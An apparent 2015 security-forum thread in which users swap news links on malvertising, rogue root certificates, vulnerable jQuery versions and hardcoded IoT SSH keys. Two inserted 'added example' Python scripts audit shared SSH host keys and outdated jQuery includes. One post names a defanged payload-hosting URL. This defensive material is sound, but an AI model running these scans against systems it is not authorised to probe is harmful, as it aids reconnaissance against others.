I did not mean that, DavidR. I meant to say there is no excuse for someone to put a WordPress site up that leaves user enumeration enabled and whose log-in info can be retrieved like plain text, as for instance "user user" or "user admin" or whatever. Such nitwits/fools should better be taken off of the Interwebs because they come to endanger themselves and everybody else. When a hoster does not inform them, the hoster is also responsible for every infection this might bring about. Still I see truckloads of websites which are such epic fails. Why do we only detect them after the fact, when they have caused incidents, and why aren't they set out before the fact for being so dangerous? But it is just like with certain parents: some should never have children, still they have them. ;D
polonus
For those that are now curious about a website's WP, read here: http://andrewrezk.com/how-to-spy-on-wordpress-sites-detect-their-wp-themes-plugins/ (article author: Andrew Rezk). Do a scan here: http://scanwp.net/
Damian
-
@ polonus
My post was directly to Eddy, whose post I quoted.
-
Beware scams in the wake of the App Store slip-up
https://blog.malwarebytes.org/mac/2015/11/beware-scams-in-the-wake-of-the-app-store-slip-up/?utm_source=Gplus&utm_medium=social
-
Google Chrome now also warning on fake websites: https://googleonlinesecurity.blogspot.jp/2015/11/safe-browsing-protection-from-even-more.html
These Google safe-browsing guys are giving me a good feeling. Next step warning for/against the technical epic fail websites?
I would welcome that ;)
polonus
-
Very scary ...
Beware of ads that use inaudible sound to link your phone, TV, tablet, and PC
http://arstechnica.com/tech-policy/2015/11/beware-of-ads-that-use-inaudible-sound-to-link-your-phone-tv-tablet-and-pc/
Greetz, Red.
-
Hi eric,
The Interwebs are turning into an ever more scary place. PNG-file buffer overflow zero-day waiting for abuse to start:
http://www.openwall.com/lists/oss-security/2015/11/12/2
Hope we can upload PNG files until this is patched. Patch here: libpng.sourceforge.net.
Vulnerable are all web browsers, Android, image viewers, media players and almost all Office programs.
-
Very scary ...
Beware of ads that use inaudible sound to link your phone, TV, tablet, and PC
http://arstechnica.com/tech-policy/2015/11/beware-of-ads-that-use-inaudible-sound-to-link-your-phone-tv-tablet-and-pc/
Greetz, Red.
Ha, Smart TV, dumb user, I think not. From a little over 5 years ago I bought a Samsung LED TV and that was meant to be a Smart TV, there is absolutely no way I would ever hook up its network connection to give it internet access. I never trusted this so called smart title just because it connects to the internet, all this with no smart TV antivirus.
I don't have a microphone connected unless I'm specifically going to use it. The same is true of my netbook and its camera (blanked off).
-
Individual targets will get pinpointed thanks to web analytics:
https://www2.fireeye.com/threat-intel-report-WITCHCOVEN.html
Some 100 websites have been purposefully hacked and manipulated to redirect visitors, without them noticing, to another website where the WITCHCOVEN script is running to gather information and hand out a super-cookie identification.
The attack then later makes use of pinpointed attacks against the target computer.
Wonder whether this is real info or just an American entertainment horror-story report coming from behind a paywall subscription. Has this info been verified :-[ Seems now Russian based....
Read from another source: https://www2.fireeye.com/threat-intel-report-WITCHCOVEN.html
polonus
-
Conficker worm, still out there
Hidden Virus Discovered in Martel Police Body Camera
http://www.goipower.com/?pageId=40
Analysis date: 2015-11-12 11:06:25 UTC ( 5 days, 7 hours ago )
https://www.virustotal.com/en/file/dfc1f69b3efc968310ed8901eda055ea40fa488059a6a3763c356539820ccc3e/analysis/
-
Conficker worm, still out there
(snip)
And if you aren't using any AV or a totally outdated VPS update, it's possible that it may get you. :)
For most people this isn't really something to worry about. :)
-
hmmm ... you mean like McAfee
-
The Casino Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2015/11/the-casino-malvertising-campaign/?utm_source=Gplus&utm_medium=social
Blast from the Past: Blackhole Exploit Kit Resurfaces in Live Attacks
https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/?utm_source=Gplus&utm_medium=social
Another Day, Another HMRC Tax Phish…
https://blog.malwarebytes.org/fraud-scam/2015/11/another-day-another-hmrc-tax-phish/?utm_source=gplus&utm_medium=social
-
Just some remarks on the detection of outdated server distributions. A lot of distributions leave the version number as it was *, but administrators may still update and patch security holes (we just do not know :o). Such practices are basically wrong, however, because excessive server header info proliferation should never, under any circumstances, be enabled in the settings by default, and actually should never be given out! An attacker may have other ways to get the info he is after, but that is outside the scope of what we warn about here.
Your server should not forward any info globally and to attackers, whatever the real security situation of that server may indicate. A list of failures for a SQL Server: https://www.simple-talk.com/sql/database-administration/how-to-get-sql-server-security-horribly-wrong/
So the assumptions of this report are questionable, but that is because of practical implications and the unreliability of passive scan results for certain criteria(see my earlier remarks *): -https://www.sidn.nl/downloads/reports/Passive+Scan+Research.pdf (do not open search results of that report - when you aren't into website security, that report isn't for you!).
polonus
-
"Doctor Web": found Linux.Encoder.2
https://news.drweb.com/show/?i=9709&lng=en&c=5
https://vms.drweb.com/virus/?i=7734389&lng=en
-
Adobe Security Bulletin - Hotfix available for ColdFusion
https://helpx.adobe.com/security/products/coldfusion/apsb15-29.html
-
London (and Dublin) calling – on a mission in the UK and Ireland
https://blog.malwarebytes.org/news/2015/11/london-and-dublin-calling-on-a-mission-in-the-uk-and-ireland/?utm_source=Gplus&utm_medium=social
10 tips to avoid Cyber Monday scams
https://www.malwarebytes.org/articles/cyber-monday/?utm_source=Gplus&utm_medium=social
No money, but Pony! From a mail to a trojan horse
https://blog.malwarebytes.org/intelligence/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/?utm_source=gplus&utm_medium=social
-
Malware Turns to DNS and Steganography to Hide C&C Communications
http://news.softpedia.com/news/malware-turns-to-dns-and-steganography-to-hide-c-c-communications-496437.shtml
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
So ad-launching outweighs security. You have to disable your adblocker to get to your mail.
What if the mail has malicious ads? "Commerce über alles, über alles in der Welt!".
polonus
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
polonus
There are a lot of other webpages using this method: if you have an anti-ad, it won't be displayed...
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
polonus
There are a lot of other webpages using this method: if you have an anti-ad, it won't be displayed...
If they want to push that, I push them and find another source.
I can allow an add in adblock+ but at the same time if the source is on a 3rd party site I can block that with RequestPolicy. That usually makes some think the ads are being delivered.
-
New Dyre variant can target Windows 10 and Microsoft Edge users
http://www.net-security.org/malware_news.php?id=3156
-
After doing a scan the report comes up with nothing under "threats", but there is a huge list of files under "warning" stating they are inaccessible. Does this mean they cannot be scanned? If so, what should be done with them?
-
After doing a scan the report comes up with nothing under "threats", but there is a huge list of files under "warning" stating they are inaccessible. Does this mean they cannot be scanned? If so, what should be done with them?
This should answer your question:
https://blog.avast.com/2014/02/28/how-do-i-handle-files-that-avast-cant-scan/
-
Fake Apps for Windows Phone Trying to Steal Passwords
http://news.softpedia.com/news/fake-apps-for-windows-phone-trying-to-steal-passwords-496523.shtml
-
Dell Laptop self-signed root certificate phishiness?
Read: https://twitter.com/rotorcowboy/status/668485780038287360
Read: http://joenord.blogspot.com/2015/11/new-dell-computer-comes-with-edellroot.html
Dell will comment on this later today. Lenovo seems no longer alone ;D
polonus
-
Malvertising pays, while Google and Yahoo are looking away
Another reason to never visit the Interwebs without a decent adblocker.
Read from article author , Alexander J Martin: http://www.theregister.co.uk/2015/11/23/liability_chain_malvertising_advertising/
polonus
-
Vonteera Adware BHO uses certificates to disable Anti-Malware: https://blog.malwarebytes.org/security-threat/2015/11/vonteera-adware-uses-certificates-to-disable-anti-malware/
Also the AVAST Software a.s. certificate is being dropped as an "Untrusted Certificate". It puts Google Chrome in silent “superpower” policy mode, together with opening a whole range of attack vectors. This adware has certainly stepped over the line for us and could be termed "a malcoded pest".
polonus
-
Vonteera Adware Uses Certificates to Disable Anti-Malware
https://blog.malwarebytes.org/security-threat/2015/11/vonteera-adware-uses-certificates-to-disable-anti-malware/?utm_source=Gplus&utm_medium=sociala
Catching Up With The ‘EITest’ Compromise, A Year Later
https://blog.malwarebytes.org/hacking-2/2015/11/catching-up-with-the-eitest-compromise-a-year-later/?utm_source=Gplus&utm_medium=social
-
Test for the bad dell certificate here: https://edell.tlsfun.de/
pol
-
Test for the bad dell certificate here: https://edell.tlsfun.de/
pol
I have a Dell Inspiron 17 5000 Series.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1448320057823-95326.png)
So why is this coming up clean and why is he recommending changing over to Linux ???
-
You do not have to worry, dear bob3160, when yours would have been ill-flagged,
you would have seen this: https://twitter.com/markloman/status/668842464913006592
It says at the bottom: Alternatively you can install Linux and delete Windows.
This is not what you should do, and maybe only someone like FreeWheelinFrank would advise such a measure,
as he is a Linux fan ;) So do not hold this against me, I did not make up that "edellweiss" root certificate test :D
At least -midnight felt rather relieved her Dell machine came up clean. ;D
Damian
-
You do not have to worry, dear bob3160, when yours would have been ill-flagged,
you would have seen this: https://twitter.com/markloman/status/668842464913006592
It says at the bottom: Alternatively you can install Linux and delete Windows.
This is not what you should do, and maybe only someone like FreeWheelinFrank would advise such a measure,
as he is a Linux fan ;) So do not hold this against me, I did not make up that "edellweiss" root certificate test :D
At least -midnight felt rather relieved her Dell machine came up clean. ;D
Damian
Sounds like someone with an alternate agenda did. :o
-
Instructions for all those that may have the dangerous Dell certificate of how to get rid of it:
https://dellupdater.dell.com/Downloads/APP009/eDellRootCertRemovalInstructions.docx
All new systems out will come without it now, according to Dell.
polonus
-
Partners in Crime delivered FUD scan services to go under the anti-virus radar....
http://www.nationalcrimeagency.gov.uk/news/749-cyber-crime-partnership-results-in-two-arrests
P.S. FUD stands for Fully Undetectable....
pol
-
At least some Dell laptops are shipping with a trusted root certificate authority pre-installed, something that those who discovered the CA are comparing to the Superfish adware installed on Lenovo machines that left them open to man-in the-middle attacks.
“Note: Dell created their #eDellRoot certificate six months after Lenovo's Superfish scandal hit the news. No lessons learned.”
http://www.networkworld.com/article/3007811/security/dell-computers-shipping-with-potentially-dangerous-root-certificate-authority.html
-
More dell sloppiness: http://www.laptopmag.com/articles/dell-certificate-security-flaw
Read: The root CA cert has the name "DSDTestProvider" -> http://www.kb.cert.org/vuls/id/925497
polonus
-
Reckon the "alleged backdoor talks with industry" we hear about were somehow rather successful, and once in a while we stumble on one or two. We gonna hear more of this...
polonus
-
On many, many, many scans for vulnerable website code I come across this library that should be retired, because it is vulnerable.
It is jquery - 1.7.1 : (active1) -https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
See why here: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Also read here about jQuery security over https: http://security.stackexchange.com/questions/11278/javascript-and-jquery-not-secure-over-https
polonus
-
Here some reasons why one should let Google host your jQuery for you: http://encosia.com/3-reasons-why-you-should-let-google-host-jquery-for-you/ link article author = Dave Ward.
A list of vulnerable jQuery Versions: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Test: http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003
This is no guarantee however, as the site linked above has a vulnerable library itself; analyzed, this was:
-http://encosia.com/
Detected libraries:
jquery - 1.9.1 : -http://encosia.com/blog/wp-content/themes/encosia/js/vendor/jquery-1.9.1.min.js
jquery - 1.11.3 : (active1) -http://encosia.com/
jquery-migrate - 1.2.1 : -http://encosia.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=b2ee832f4b422db251d428d07d4b1c67
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected.
WordPress configuration at the mentioned site seems OK.
I check sites with Detect jQuery
// @namespace http://www.top-info.de/thein
// @description Detect jQuery on every page
This runs in Google Chrome via the Tampermonkey extension!
The Appspector extension also gives this info for every page you visit.
polonus
-
Google at it again: http://www.theguardian.com/technology/2015/nov/25/google-bug-buries-yelp-tripadvisor-search
Google claims it is a bug, but an effective one for the monopolist ;)
polonus
-
Video Ads: Malvertising’s Next Frontier?
https://blog.malwarebytes.org/malvertising-2/2015/11/video-ads-malvertisings-next-frontier/?utm_source=Gplus&utm_medium=sociala
The Road to Black Friday: Stats and Security Tips
https://blog.malwarebytes.org/security-threat/2015/11/the-road-to-black-friday-stats-and-security-tips/?utm_source=Gplus&utm_medium=social
A Week in Security (Nov 15 – Nov 21)
https://blog.malwarebytes.org/online-security/2015/11/a-week-in-security-nov-15-nov-21/?utm_source=gplus&utm_medium=social
-
The Internet of Things bad, bad security situation: http://www.theregister.co.uk/2015/11/26/lazy_iot_skeleton_keys/
link article author = Shaun Nichols
Yes folks, it is much worse than we thought it was or did we already expect it to be bad ;)
Infosec biz Sec Consult says it studied 4,000 embedded devices from 70 hardware makers, and found that many products are sharing the same hardwired SSH login keys and server-side SSL certificates. Hack one and you will/may hack many...
polonus
-
More than 26,000 Cisco devices sold by Australia's dominant telco Telstra are open to hijacking via hardcoded SSH login keys and SSL certificates. Re: http://www.theregister.co.uk/2015/11/27/nine_percent_of_encrypted_traffic_open_to_hijack_from_shared_keys/
Millions of others may also be vulnerable: there are no patches or workarounds available for the security blunder, which potentially affects millions of users. One workaround would be to ensure the SSH and HTTPS configuration servers in the routers are firewalled off from harm.
polonus
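An added example for the two posts above on shared hardwired SSH host keys; it is not code from SEC Consult, The Register, or the posters. Given host-key lines in the format `ssh-keyscan` or a `known_hosts` file produces (the sample below is constructed, the "keys" are arbitrary bytes, not real keys), it computes OpenSSH-style SHA256 fingerprints and reports every key that more than one host presents. That is exactly the condition that makes one compromised or reverse-engineered device a skeleton key for the rest. The same grouping works for TLS certificates if you feed it the SHA-256 fingerprint of each server's leaf certificate instead.

```python
"""Find SSH host keys shared across devices in your inventory (added example)."""
import base64
import hashlib
from collections import defaultdict


def fingerprint(b64_key: str) -> str:
    """OpenSSH-style fingerprint: SHA256:<base64 of sha256(key blob), no padding>."""
    blob = base64.b64decode(b64_key)
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keyscan(lines):
    """Yield (host, key_type, key) from ssh-keyscan / known_hosts style lines.

    Lines are '<host> <key-type> <base64 key> [comment]'; blank lines and
    '#' comments (ssh-keyscan prints one per host) are skipped.
    """
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        yield parts[0], parts[1], parts[2]


def shared_keys(lines, min_hosts: int = 2) -> dict:
    """Map (key_type, fingerprint) -> sorted hosts for keys seen on >= min_hosts hosts."""
    by_fp = defaultdict(set)
    for host, key_type, key in parse_keyscan(lines):
        by_fp[(key_type, fingerprint(key))].add(host)
    return {fp: sorted(hosts) for fp, hosts in by_fp.items() if len(hosts) >= min_hosts}


# Constructed sample input: three CPE routers present the same RSA key,
# two other devices have keys of their own.
SHARED = base64.b64encode(b"constructed shared firmware key").decode()
UNIQUE_A = base64.b64encode(b"constructed unique key A").decode()
UNIQUE_B = base64.b64encode(b"constructed unique key B").decode()
SAMPLE_KEYSCAN = f"""# constructed sample in ssh-keyscan output format
cpe-01.example.net ssh-rsa {SHARED}
cpe-02.example.net ssh-rsa {SHARED}
192.0.2.77 ssh-rsa {SHARED}
core-rtr.example.net ssh-ed25519 {UNIQUE_A}
cpe-03.example.net ssh-rsa {UNIQUE_B}
""".splitlines()


if __name__ == "__main__":
    for (key_type, fp), hosts in shared_keys(SAMPLE_KEYSCAN).items():
        print(f"{key_type} {fp} shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

In practice the input comes from `ssh-keyscan -t rsa,ecdsa,ed25519 -f hosts.txt` run from a machine that is allowed to probe the management interfaces; any group the script prints is a set of devices whose SSH sessions can be impersonated by whoever extracts the private key from one unit's firmware, so those devices are the ones to firewall off, as the post suggests, until a regenerated per-device key is available.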
-
Steam’s “Exploration Sale” Gamifies Security Settings
https://blog.malwarebytes.org/online-security/2015/11/steams-exploration-sale-gamifies-security-settings/?utm_source=Gplus&utm_medium=social
-
Adobe Is Telling People to Stop Using Flash (http://recode.net/2015/12/01/adobe-is-telling-people-to-stop-using-flash/)
-
Microsoft Security Advisory 3119884 - Inadvertently Disclosed Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/3119884.aspx
-
Return of the old vundo malware: http://blog.fox-it.com/2015/12/02/ponmocup-a-giant-hiding-in-the-shadows/
polonus
-
I have a personal website that Avast will not let me go to; "it says it might harm my computer".
This is not a bad/dangerous site at all. The confusing thing to me is that I don't have Avast installed on my computer. What's going on?
-
I have a personal website that Avast will not let me go to; "it says it might harm my computer".
This is not a bad/dangerous site at all. The confusing thing to me is that I don't have Avast installed on my computer. What's going on?
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
-
FrameFox: Nominated for the Most Aggressive EULA
https://blog.malwarebytes.org/security-threat/2015/11/framefox-nominated-for-the-most-aggressive-eula/?utm_source=Gplus&utm_medium=social
Lesson...read the EULA every time you install any software.
Large Number of Adult Sites Distribute Malware Via AdXpansion Malvertising
https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/?utm_source=Gplus&utm_medium=social
A solid ad blocker like Adguard AdBlocker and Ghostery are a must these days.
-
For most people life is too short to read every EULA and that is what most companies hope for.
I used to have a little program EULA Analyser that broke down the EULA into easily understood plain English (not legalese) terms.
-
If I read every EULA, I would never install anything on my computer.
I might actually never buy a computer..... :)
The program David mentioned is probably this one:
http://www.brightfort.com/eulalyzer.html
-
Hi bob3160,
As you know what to expect there is no need for it ;)
polonus
-
If I read every EULA, I would never install anything on my computer.
I might actually never buy a computer..... :)
The program David mentioned is probably this one:
http://www.brightfort.com/eulalyzer.html
Yes, that's the one, a real handy tool.
-
For most people life is to short to read every EULA and that is what most companies hope for.
Speaking of which (https://forum.avast.com/index.php?topic=85679.msg1273108#msg1273108)
-
Hundreds of pr0n-sites source of malicious ads: https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/
polonus
-
Hundreds of pr0n-sites source of malicious ads: https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/
polonus
Polonus, do you have any info about this kind of malware that could be converted into a blog article?
-
Hi Lisandro,
When it goes into a blog article warn about the nature of the adxpansion threat e.g. explicit adult content.
This is not suitable info for minors!
Besides this has been all over the news at MBAM forum and other places,
so what would be the additional avast blog content value?
But here then is the story in a nutshell and understandable for a greater user base.
It all comes down to cybercriminal fraudulent adxpansion abuse.
Read here: https://www.mywot.com/en/scorecard/adxpansion.com?utm_source=addon&utm_content=popup
This is classified as a 34% high risk site. The malicious manipulation of the ads is not done by the parties that buy ads, but by third parties that manipulate.
We see high risk vulnerabilities here. It is a known Flash ad/exploit attack scheme as this technique simply relies on a disguised Flash advert that downloads its own exploit and payload. The traffic for ads it seeks to malcreate runs in the millions of clicks... So disabling or uninstall Flash or enable it on demand only could help protect.
Like the DirectRev malvertising, this uses a self-sufficient Flash 0day.
The ad is booby-trapped such that it silently loads an external URL
and that is not a direct no-no in unethical ad-serving for the adlaunching industry, so can be abused easily.
See observed sub-domains: https://www.virustotal.com/nl/domain/adxpansion.com/information/
This site for instance that was used in the hack was earlier hacked and compromised, so found to be vulnerable
-malenkiyprince dot ru
re: -http://malenkiyprince.otel-v-krimu.ru/aan.txt
The Flash exploit used was described here: http://malware.dontneedcoffee.com/2015/10/cve-2015-7645.html
Here it was not detected and this should be so under normal instances: http://www.stwhisper.com/www.malenkiyprince.ru
More on this malcode issue here: http://avpclub.alone.tw/discuz/redirect.php?tid=53748&goto=lastpost
So now you see how devious this is and why an adult user should never go on to the Internet without a decent adblocker and a good script blocker.
polonus (volunteer website security analyst and website error-hunter)
-
“INTUIT Security Warning” Emails Lead to Fake Browser Update Malware
https://blog.malwarebytes.org/security-threat/2015/12/intuit-security-warning-emails-lead-to-fake-browser-update-malware/?utm_source=Gplus&utm_medium=social
-
Adobe Flash Player Update: Say Hello to New 'Adobe Animate CC'
http://www.latinpost.com/articles/99836/20151204/adobe-flash-player-update-hello-new-animate-cc.htm
-
Kicking in an open door here: http://www.darkreading.com/vulnerabilities---threats/the-programming-languages-that-spawn-the-most-software-vulnerabilities/d/d-id/1323397?
PHP, ASP Web scripting languages breed more vulnerabilities than Java, .NET programming platforms, Veracode's new state of software security report says.
And it still is very much the truth: Chris Wysopal: "When I see a breach, one of the things that sticks out in my head is 'I'll bet that was a PHP site.'"
polonus (volunteer website security analyst and website error-hunter)
-
Steer Clear of Movie Spam Subreddits
https://blog.malwarebytes.org/online-security/2015/12/steer-clear-of-movie-spam-subreddits/?utm_source=Gplus&utm_medium=social
-
OpenSSL Security Advisory [3 Dec 2015]
http://openssl.org/news/secadv/20151203.txt
-
Malvertising returns to DailyMotion again: https://blog.malwarebytes.org/malvertising-2/2015/12/malvertising-hits-dailymotion-serves-up-angler-ek/
The fake traffic schemes that are rotting your Internet: http://www.bloomberg.com/features/2015-click-fraud/
pol
-
Spy-malware researchers' lives were threatened by malcreant(s): https://citizenlab.org/2015/12/packrat-report/
polonus
-
Found this just two days old Malwarebytes blogpost about Dailymotion malvertising: https://blog.malwarebytes.org/malvertising-2/2015/12/malvertising-hits-dailymotion-serves-up-angler-ek/
Hope that adblockers are enough to protect casual users from these kind of things. :-\
-
Hi Pernaman,
On the other hand the leaking of private data goes on, for instance on Dutch medical websites and Dutch hospital websites. These sites will leak user health information to commercial third parties. Data-services like AddThis and ShareThis are known to create such user tracking profiles from visitor web history, search queries, etc. Trackers were only removed after Dutch TV journalists had asked questions. So a decent ad/track-blocker is a tool we cannot go without, for our own good...
polonus
-
The Independent WP Blog (was) spreading Ransomware malware: http://blog.trendmicro.com/trendlabs-security-intelligence/blog-of-news-site-the-independent-hacked-leads-to-teslacrypto-ransomware/
polonus
-
Microsoft Security Bulletin Summary for December 2015
https://technet.microsoft.com/en-us/library/security/ms15-dec.aspx
-
Yandex acquires software developer Agnitum
http://www.telecompaper.com/news/yandex-acquires-software-developer-agnitum--1117968
-
Commodores never die ;)
A 1980s Commodore PC has controlled this school district's A/C for 30 years
http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/?fb=ss&prtnr=wired
-
Commodores never die ;)
A 1980s Commodore PC has controlled this school district's A/C for 30 years
http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/?fb=ss&prtnr=wired
They just don't make things like they used to. I still have a working Commodore Vic 20. :)
-
Data Dissonance: Tunecore Breached
https://blog.malwarebytes.org/online-security/2015/12/data-dissonance-tunecore-breached/?utm_source=linkedin&utm_medium=socialIf
Malware Targeting Steam Traders Banks on New Escrow System
https://blog.malwarebytes.org/online-security/2015/12/malware-targeting-steam-traders-banks-on-new-escrow-system/?utm_source=Gplus&utm_medium=social
-
Inside Chimera Ransomware – the first ‘doxingware’ in wild
https://blog.malwarebytes.org/intelligence/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/
-
Microsoft ends support for .Net Framework 4, 4.5 and 4.5.1
http://www.ghacks.net/2015/12/10/microsoft-ends-support-for-net-framework-4-4-5-and-4-5-1/
-
10% of Google chrome users infested with unwanted software: https://googleonlinesecurity.blogspot.nl/2015/12/year-one-progress-in-fight-against.html link article authors: Moheeb Abu Rajab, Google Security Team.
polonus
-
10% of Google chrome users infested with unwanted software: https://googleonlinesecurity.blogspot.nl/2015/12/year-one-progress-in-fight-against.html link article authors: Moheeb Abu Rajab, Google Security Team.
polonus
Some help for this is Unchecky (http://unchecky.com/). More importantly is learning to use the custom install option. :)
-
Vulnerability in Java Deserialization Affecting Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization
-
Vulnerability in Java Deserialization Affecting Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization
Meaning only when JRE is enabled, or even when it's not since there's Java components in Cisco's tools?
-
You’re so predictable: the AV vulnerability that bypasses mitigations
http://blog.ensilo.com/the-av-vulnerability-that-bypasses-mitigations
-
WordPress hoster hacked, data breach, see: https://wpengine.com/support/infosec/
As I said on many occasions WP has a lot of security issues, like outdated versions used, outdated or leftover plug-ins,
this was found on that site we discuss here: ditty-news-ticker latest release (2.0.4)
http://dittynewsticker.com/
Not at this site but often for WP sites User Enumeration and Directory Indexing is enabled, a dangerous security misconfiguration!
The hacked website in question also had jQuery libraries that should come retired asap:
Detected libraries:
jquery - 1.8.3 : -https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery-ui-dialog - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
Info: Severity: medium
http://bugs.jqueryui.com/ticket/6016
jquery-ui-autocomplete - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
jquery-ui-tooltip - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
Info: Severity: high
http://bugs.jqueryui.com/ticket/8859
jquery - 1.6.4 : -https://cdn.optimizely.com/js/836340079.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
4 vulnerable libraries detected
And that at a hosting website where users go to find security they can trust :o
polonus (volunteer website security analyst and website error-hunter)
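An added example that serves both this post and the earlier one about jQuery 1.7.1 on ajax.googleapis.com; it is not the "Detect jQuery" userscript, the Appspector extension, or any other tool named in the thread. It pulls every `<script src>` out of an HTML page, recognises jQuery and jQuery UI versions from CDN paths, versioned file names and WordPress-style `?ver=` query strings, and flags versions older than the releases that closed the cited tickets. Those fix versions (jQuery 1.9.0 for bugs.jquery.com #11290, jQuery UI 1.10.0 for bugs.jqueryui.com #6016 and #8859) are my reading of the tickets, not values stated in the posts. The sample HTML is constructed from the script URLs the posts list.

```python
"""Flag outdated jQuery / jQuery UI script includes in an HTML page (added example)."""
import re
from html.parser import HTMLParser

# library -> (first version with the cited fix, reference); assumed thresholds
FIXED_IN = {
    "jquery": ((1, 9, 0), "bugs.jquery.com/ticket/11290"),
    "jquery-ui": ((1, 10, 0), "bugs.jqueryui.com/ticket/6016, /ticket/8859"),
}

# .../libs/jquery/1.7.1/jquery.min.js, jquery-1.9.1.min.js, .../jqueryui/1.9.2/...
VERSION_IN_URL = re.compile(r"(jqueryui|jquery-ui|jquery)[/-](\d+\.\d+(?:\.\d+)?)", re.I)
# WordPress style: /wp-includes/js/jquery/jquery.js?ver=1.11.3 (jquery-migrate excluded)
WP_VER_QUERY = re.compile(r"(jquery-ui|jquery)(?!-migrate)[^?\"'\s]*[?&]ver=(\d+\.\d+(?:\.\d+)?)", re.I)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def parse_version(text: str) -> tuple:
    """'1.9' -> (1, 9, 0) so that tuple comparison works across lengths."""
    parts = [int(x) for x in text.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def detect_library(src: str):
    """Return (library, version tuple) if src looks like jQuery or jQuery UI."""
    match = VERSION_IN_URL.search(src) or WP_VER_QUERY.search(src)
    if not match:
        return None
    lib = match.group(1).lower().replace("jqueryui", "jquery-ui")
    return lib, parse_version(match.group(2))


def audit_html(html: str) -> list:
    """One finding per recognised script include, marking outdated versions."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        hit = detect_library(src)
        if not hit:
            continue
        lib, ver = hit
        fixed, reference = FIXED_IN[lib]
        outdated = ver < fixed
        findings.append({
            "src": src,
            "library": lib,
            "version": ".".join(map(str, ver)),
            "vulnerable": outdated,
            "reference": reference if outdated else None,
        })
    return findings


# Constructed sample page built from the script URLs listed in the posts.
SAMPLE_HTML = """<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script src="http://encosia.com/blog/wp-content/themes/encosia/js/vendor/jquery-1.9.1.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
<script src="/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=b2ee832f4b422db251d428d07d4b1c67"></script>
<script src="/wp-includes/js/jquery/jquery.js?ver=1.11.3"></script>
<script src="/static/app.js"></script>
</head><body></body></html>"""


if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML):
        flag = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{f['library']} {f['version']:8} {flag:10} {f['src']}")
```

The check is purely static, so like the passive scans discussed earlier it cannot tell whether the vulnerable code path is actually reachable on the page; treat a hit as a reason to retire the library, not as proof of an exploitable site.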
-
Avoid this Lloyds Bank Phish Attempt
https://blog.malwarebytes.org/fraud-scam/2015/12/avoid-this-lloyds-bank-phish-attempt/?utm_source=Gplus&utm_medium=social
Spike in Malvertising Attacks Via Nuclear EK Pushes Ransomware
https://blog.malwarebytes.org/malvertising-2/2015/12/spike-in-malvertising-attacks-via-nuclear-ek-pushes-ransomware/?utm_source=gplus&utm_medium=social
-
Lenovo Security Advisory: LEN-4326
https://support.lenovo.com/product_security/len_4326
-
Lenovo Security Advisory: LEN-4326
https://support.lenovo.com/product_security/len_4326
Wow Lenovo are certainly getting a hammering on security of late.
-
Google to block a Symantec root certificate
